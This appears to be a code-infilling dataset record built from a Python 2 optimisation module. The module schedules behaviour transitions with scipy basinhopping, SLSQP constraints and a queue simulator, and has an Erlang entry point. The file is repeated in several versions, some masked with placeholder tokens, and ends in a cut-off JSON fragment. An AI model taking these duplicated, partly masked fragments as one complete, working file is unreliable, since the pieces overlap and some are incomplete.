step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,
interval=20, minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda
x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.
integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim
.linear_relief, deadtime_penalty=4):
"""Generates the components necessary to completely specify
best-path optimization routine. (With a queue model)
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
"""
B = np.vstack(BTable[bid] for bid in path)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
"""Simulate the queue effects, and then evaluate the objective function
on the simulation result"""
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=
BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes
) ** 2 - avg_rates.sum() * Acc.sum()
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
<|reserved_special_token_0|>
def parse_behaviours(behaviours, dtype=np.float32):
"""[(bid, [bvec])] -> {bid: <bvec>}"""
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
"""[[float]] -> np.array(...) of same shape"""
return np.array(F)
<|reserved_special_token_0|>
def range_sum(cum_F, a, b, penalty=-1000):
"""Penalty brutally dominates any out-of-index operation..."""
z = cum_F.shape[-1] - 1
if not 0 <= a <= z or not 0 <= b <= z:
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
<|reserved_special_token_0|>
def barrier(times, path, BTG):
"""Handles Linear/causality Constraints with respect to transitions"""
t = [0] + list(times)
S = 0.0
for i in xrange(len(path) - 1):
edge = path[i], path[i + 1]
tau = BTG[edge]
S += min(0, t[i + 1] - t[i] - tau)
return S
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Bounds(object):
"""Required for acceptance testing in scipy.optimize.basinhopping"""
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs['x_new']
return self.is_valid(x)
def SLSQP_constraints(self):
"""Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i"""
funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.
costs[1:])]
funs.append(lambda x: x[0] + self.costs[0])
funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]
funs += [lambda x: -x[i]]
n = len(self.costs)
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
}, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
"""Return bounds as sequence"""
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
"""Erlang Entry Point to Optimization Module"""
B_table = parse_behaviours(behaviours)
BTG = parse_edgelist(btg)
F = parse_prediction(prediction)
path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)
return list(path), map(lambda x: int(x) + start, t.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
method='SLSQP'):
"""
Perform the mixed ILP optimization (without queues, or memory), that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
"""
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds
(), 'constraints': bounds.SLSQP_constraints()[method.lower()]}
result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=
step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,
interval=20, minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda
x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.
integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim
.linear_relief, deadtime_penalty=4):
"""Generates the components necessary to completely specify
best-path optimization routine. (With a queue model)
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
"""
B = np.vstack(BTable[bid] for bid in path)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
"""Simulate the queue effects, and then evaluate the objective function
on the simulation result"""
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=
BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes
) ** 2 - avg_rates.sum() * Acc.sum()
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
def parse_edgelist(edges):
"""[((a, b), tau)] -> {(a, b): tau}"""
return {(a, b): tau for (a, b), tau in edges}
def parse_behaviours(behaviours, dtype=np.float32):
"""[(bid, [bvec])] -> {bid: <bvec>}"""
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
"""[[float]] -> np.array(...) of same shape"""
return np.array(F)
def initial_soln(path, t_max):
"""Evenly Distributed, no check for taus"""
j = t_max / len(path)
return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])
def transition_costs(path, btg):
"""Sequence of transition costs associated with the prescribed path"""
return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
"""Penalty brutally dominates any out-of-index operation..."""
z = cum_F.shape[-1] - 1
if not 0 <= a <= z or not 0 <= b <= z:
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
def flow_served(cum_F, times, costs, queue_model=None, dt=1.0):
"""Times: [t1, ..., td],
costs: [t_{b0, b1}, t_{b1, b2}, ...]
Returns the Fulfillment matrix associated with each behaviour segment."""
discr_index = lambda x: int(x / dt) - 1
t_steps = [0] + map(discr_index, times)
t_steps.append(cum_F.shape[-1] - 1)
c_steps = [0] + map(discr_index, costs)
result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +
1]) for i in xrange(len(costs) + 1)])
return result
def obj(times, B, cum_F, costs, dt=1.0):
"""Objective Function for Hillclimbing"""
Z = B * flow_served(cum_F, times, costs, dt=dt)
return Z.sum()
def barrier(times, path, BTG):
"""Handles Linear/causality Constraints with respect to transitions"""
t = [0] + list(times)
S = 0.0
for i in xrange(len(path) - 1):
edge = path[i], path[i + 1]
tau = BTG[edge]
S += min(0, t[i + 1] - t[i] - tau)
return S
<|reserved_special_token_1|>
from erlport.erlterms import Atom
from scipy.optimize import basinhopping
import numpy as np
import qsim
class Bounds(object):
"""Required for acceptance testing in scipy.optimize.basinhopping"""
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs['x_new']
return self.is_valid(x)
def SLSQP_constraints(self):
"""Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i"""
funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.
costs[1:])]
funs.append(lambda x: x[0] + self.costs[0])
funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]
funs += [lambda x: -x[i]]
n = len(self.costs)
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
}, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
"""Return bounds as sequence"""
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
"""Erlang Entry Point to Optimization Module"""
B_table = parse_behaviours(behaviours)
BTG = parse_edgelist(btg)
F = parse_prediction(prediction)
path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)
return list(path), map(lambda x: int(x) + start, t.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
method='SLSQP'):
"""
Perform the mixed ILP optimization (without queues, or memory), that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
"""
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds
(), 'constraints': bounds.SLSQP_constraints()[method.lower()]}
result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=
step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,
interval=20, minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda
x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.
integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim
.linear_relief, deadtime_penalty=4):
"""Generates the components necessary to completely specify
best-path optimization routine. (With a queue model)
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
"""
B = np.vstack(BTable[bid] for bid in path)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
"""Simulate the queue effects, and then evaluate the objective function
on the simulation result"""
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=
BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes
) ** 2 - avg_rates.sum() * Acc.sum()
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
def parse_edgelist(edges):
"""[((a, b), tau)] -> {(a, b): tau}"""
return {(a, b): tau for (a, b), tau in edges}
def parse_behaviours(behaviours, dtype=np.float32):
"""[(bid, [bvec])] -> {bid: <bvec>}"""
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
"""[[float]] -> np.array(...) of same shape"""
return np.array(F)
def initial_soln(path, t_max):
"""Evenly Distributed, no check for taus"""
j = t_max / len(path)
return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])
def transition_costs(path, btg):
"""Sequence of transition costs associated with the prescribed path"""
return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
"""Penalty brutally dominates any out-of-index operation..."""
z = cum_F.shape[-1] - 1
if not 0 <= a <= z or not 0 <= b <= z:
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
def flow_served(cum_F, times, costs, queue_model=None, dt=1.0):
"""Times: [t1, ..., td],
costs: [t_{b0, b1}, t_{b1, b2}, ...]
Returns the Fulfillment matrix associated with each behaviour segment."""
discr_index = lambda x: int(x / dt) - 1
t_steps = [0] + map(discr_index, times)
t_steps.append(cum_F.shape[-1] - 1)
c_steps = [0] + map(discr_index, costs)
result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +
1]) for i in xrange(len(costs) + 1)])
return result
def obj(times, B, cum_F, costs, dt=1.0):
"""Objective Function for Hillclimbing"""
Z = B * flow_served(cum_F, times, costs, dt=dt)
return Z.sum()
def barrier(times, path, BTG):
"""Handles Linear/causality Constraints with respect to transitions"""
t = [0] + list(times)
S = 0.0
for i in xrange(len(path) - 1):
edge = path[i], path[i + 1]
tau = BTG[edge]
S += min(0, t[i + 1] - t[i] - tau)
return S
<|reserved_special_token_1|>
from erlport.erlterms import Atom
from scipy.optimize import basinhopping
import numpy as np
import qsim
class Bounds(object):
'''Required for acceptance testing in scipy.optimize.basinhopping'''
def __init__(self, xmin, xmax, costs):
self.xmax = xmax
self.xmin = xmin
self.costs = costs
def is_valid(self, x):
tmax = bool(np.all(x <= self.xmax))
tmin = bool(np.all(x >= self.xmin))
in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]
in_order.append(x[0] <= self.costs[0])
return tmax and tmin and all(in_order)
def __call__(self, **kwargs):
x = kwargs["x_new"]
return self.is_valid(x)
def SLSQP_constraints(self):
'''Return inequality constraints for SLSQP,
in particular, assert that 0 >= x_i - x_i-1 forall i'''
funs = [lambda x: x[i + 1] - x[i] + c
for i, c in enumerate(self.costs[1:])]
funs.append(lambda x: x[0] + self.costs[0])
funs += [lambda x: x[i] for i in xrange(len(self.costs))]
funs += [lambda x: -x[i]]
# im matrix form
n = len(self.costs)
# -x_i <= 0
neg = np.identity(n) * -1
rhs1 = np.ones(n) * self.xmin
rhs1[0] += self.costs[0]
# tmax constraints
tmax = np.identity(n)
rhs2 = np.ones(n) * self.xmax
# cost constraints
A = np.vstack((neg, tmax))
b = np.hstack((rhs1, rhs2))
if n >= 2:
root = [1, -1] + [0] * (n - 2)
z = np.vstack([np.roll(root, i) for i in xrange(n-1)])
rhs3 = np.array(self.costs[1:])
A = np.vstack((A, z))
b = np.hstack((b, rhs3))
return {"slsqp": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},
"cobyla": [{'type': 'ineq', 'fun': f} for f in funs]}
def SLSQP_bounds(self):
'''Return bounds as sequence'''
return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]
class Stepper(object):
def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
self.bounds = bounds
self.stepsize = stepsize
self.max_iter = max_iter
self.deflate = deflate
def __call__(self, x):
y = None
for i in xrange(self.max_iter):
B = self.deflate ** (i + 1)
r = self.stepsize * B
u = np.random.uniform(-r, r, x.shape)
if self.bounds.is_valid(x + u):
x += u
return x
return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
'''Erlang Entry Point to Optimization Module'''
B_table = parse_behaviours(behaviours)
BTG = parse_edgelist(btg)
F = parse_prediction(prediction)
path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)
return list(path), map(lambda x: int(x) + start, t.x)
def best_path(paths, Behaviour_Table, BTG, F, dt=1.,
maxiter=20, Acc0=None, method="SLSQP"):
'''
Perform the mixed ILP optimization (without queues, or memory), that yields
the optimal behaviour transition through the BTG.
:paths -> iterable of path-iterables, path-domain for optimization
Each path-iterable contains only behaviour_id.
:Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}
Must contain all behaviours in btg
:btg -> Behaviour Transition Graph, nodes are behaviour_ids,
dictionary of the form {(v_1, v_2): tau_1,2}
:F -> Prediction matrix, of shape (|b_vec|, n),
where n is int(T_max/dt)
:dt -> Prediction time-resolution
:Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.
'''
# Given a particular path, find the optimal times to transition
Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0
Solutions = []
t_max = int((F.shape[-1] - 1) * dt)
initial_T = F.sum() / len(paths[0])
for path in paths:
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,
BTG, t_max, F, dt=dt, Acc0=Acc0)
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),
'constraints': bounds.SLSQP_constraints()[method.lower()],
}
result = basinhopping(L, x0.copy(),
accept_test=bounds,
take_step=step_taker, stepsize=10*dt,
niter=maxiter, T=initial_T,
interval=20,
minimizer_kwargs=minimizer_kwargs)
Solutions.append(result)
i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),
key=lambda x: x[1].fun)
return paths[i], BestPath
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0,
q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},
q_relief_model=qsim.linear_relief,
deadtime_penalty=4):
'''Generates the components necessary to completely specify
best-path optimization routine. (With a queue model)
Returns:
:Lagrangian Objective Function L(x) -> Contains a Barrier Component
:x0 -> an initial realizeable solution
:bounds -> a Bounds() object, that defines surrounding hyper-volume for x
'''
B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)
taus = transition_costs(path, BTG)
x0 = initial_soln(path, t_max)
bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)
def cost(x, p=deadtime_penalty):
'''Simulate the queue effects, and then evaluate the objective function
on the simulation result'''
k = F.shape[1] if F.shape[1] > 0 else 1
avg_rates = F.sum(1) / k
Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,
Acc0=Acc0, relief_mode_kwargs={"rate": 0.5})
cum_Z = np.cumsum(Z, axis=1)
Deadtimes = np.where(Z == 0, 0, 1).sum(1)
return (-obj(x, B, cum_Z, taus, dt=dt)
+ 0.25* avg_rates.dot(Deadtimes) ** 2
- avg_rates.sum()*Acc.sum()) # ????
step_taker = Stepper(bounds, 10, 20)
return cost, x0, bounds, step_taker
# Parsers ###############################################################
def parse_edgelist(edges):
'''[((a, b), tau)] -> {(a, b): tau}'''
return {(a, b): tau for (a, b), tau in edges}
def parse_behaviours(behaviours, dtype=np.float32):
'''[(bid, [bvec])] -> {bid: <bvec>}'''
return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}
def parse_prediction(F):
'''[[float]] -> np.array(...) of same shape'''
return np.array(F) # Might not work, will check back later
# Optimization ###############################################################
def initial_soln(path, t_max):
'''Evenly Distributed, no check for taus'''
j = t_max / len(path)
return np.array([(i + 1) * j for i in xrange(len(path) - 1)])
def transition_costs(path, btg):
'''Sequence of transition costs associated with the prescribed path'''
return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
'''Penalty brutally dominates any out-of-index operation...'''
z = cum_F.shape[-1] - 1
if (not 0 <= a <= z) or (not 0 <= b <= z):
return np.ones(cum_F.shape[0]) * penalty
return cum_F[..., b] - cum_F[..., a]
def flow_served(cum_F, times, costs, queue_model=None, dt=1.):
'''Times: [t1, ..., td],
costs: [t_{b0, b1}, t_{b1, b2}, ...]
Returns the Fulfillment matrix associated with each behaviour segment.'''
discr_index = lambda x: int(x / dt) - 1
t_steps = [0] + map(discr_index, times)
t_steps.append(cum_F.shape[-1] - 1) # t_max
c_steps = [0] + map(discr_index, costs)
result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])
for i in xrange(len(costs) + 1)])
return result
def obj(times, B, cum_F, costs, dt=1.):
'''Objective Function for Hillclimbing'''
Z = B * flow_served(cum_F, times, costs, dt=dt)
return Z.sum()
def barrier(times, path, BTG):
'''Handles Linear/causality Constraints with respect to transitions'''
t = [0] + list(times)
S = 0.
for i in xrange(len(path) - 1):
edge = (path[i], path[i + 1])
tau = BTG[edge]
S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is voilated
return S
|
flexible
|
{
"blob_id": "0f4bdaecef356e01cbef527d4886564d9ef840fa",
"index": 5573,
"step-1": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\n<mask token>\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
